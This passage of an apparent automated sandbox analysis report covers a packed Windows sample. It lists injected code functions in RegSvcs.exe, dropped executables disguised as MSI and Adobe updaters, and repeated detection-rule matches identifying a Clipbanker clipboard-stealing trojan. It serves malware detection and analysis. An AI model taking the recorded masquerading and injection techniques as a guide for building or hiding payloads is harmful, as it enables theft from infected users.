        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_062B09300_2_062B0930
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0044002D2_2_0044002D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C00A02_2_004C00A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004AA2002_2_004AA200
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040A2C02_2_0040A2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0050A2B02_2_0050A2B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004BE3C02_2_004BE3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004963B02_2_004963B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004DE4302_2_004DE430
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004B84D02_2_004B84D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004FA4802_2_004FA480
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005145502_2_00514550
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004845E02_2_004845E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004906002_2_00490600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E06D02_2_004E06D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004986B02_2_004986B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004FA9302_2_004FA930
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E4BD02_2_004E4BD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00458BB02_2_00458BB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004FAD002_2_004FAD00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0049AF602_2_0049AF60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004DF0302_2_004DF030
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0049F0D02_2_0049F0D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0049D3A02_2_0049D3A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0053F5502_2_0053F550
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004B36002_2_004B3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D76002_2_004D7600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004B16302_2_004B1630
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004957902_2_00495790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040B8E02_2_0040B8E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0048BAC82_2_0048BAC8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004ADB202_2_004ADB20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00481C102_2_00481C10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00409C902_2_00409C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F7D002_2_004F7D00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00545DE02_2_00545DE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00493F402_2_00493F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004C1F202_2_004C1F20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005220D02_2_005220D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F60E02_2_004F60E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004EE1702_2_004EE170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0048611D2_2_0048611D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004A62502_2_004A6250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0044036F2_2_0044036F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004A43202_2_004A4320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F04502_2_004F0450
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F85F02_2_004F85F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004547BF2_2_004547BF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F28202_2_004F2820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004A88B02_2_004A88B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043C9602_2_0043C960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005469702_2_00546970
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0043A9282_2_0043A928
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F8B402_2_004F8B40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004EEC402_2_004EEC40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00534D402_2_00534D40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00546D202_2_00546D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0053AE202_2_0053AE20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00458E302_2_00458E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00506EA02_2_00506EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00516EA02_2_00516EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004ECF202_2_004ECF20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F2FD02_2_004F2FD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004930802_2_00493080
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004371A02_2_004371A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005031A02_2_005031A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004A93802_2_004A9380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D14502_2_004D1450
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0042F5802_2_0042F580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004D36002_2_004D3600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004A36102_2_004A3610
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CF6F02_2_004CF6F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005477602_2_00547760
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F77302_2_004F7730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E77E02_2_004E77E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005397B02_2_005397B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004F79602_2_004F7960
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0047B9702_2_0047B970
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004EF9A02_2_004EF9A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004CBAC02_2_004CBAC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0044DA862_2_0044DA86
        Source: Joe Sandbox ViewDropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00547510 appears 85 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00434380 appears 55 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041ACE0 appears 125 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00402CF0 appears 69 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CFB90D8 appears 51 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CFBD520 appears 31 times
        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6CFB9B35 appears 141 times
        Source: file.exe, 00000000.00000002.1661516175.0000000005F01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1650364480.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
        Source: file.exe, 00000000.00000002.1650364480.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1649194054.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
        Source: file.exe, 00000000.00000002.1650745382.0000000005238000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1646478004.00000000003D7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameportablefromhelp_hub5.exeL vs file.exe
        Source: file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
        Source: file.exe, 00000000.00000000.1635326794.00000000003DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameportablefromhelp_hub5.exeL vs file.exe
        Source: file.exe, 00000000.00000002.1659625676.0000000005A10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1650745382.00000000050AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1659746305.0000000005BB8000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs file.exe
        Source: file.exe, 00000000.00000002.1649194054.000000000139B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs file.exe
        Source: file.exeBinary or memory string: OriginalFilenameportablefromhelp_hub5.exeL vs file.exe
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 22.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 22.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 21.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 21.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
        Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995424107142857
        Source: file.exeStatic PE information: Section: .boot ZLIB complexity 0.9927286974075649
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/33@2/4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_005447E0 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA,2_2_005447E0
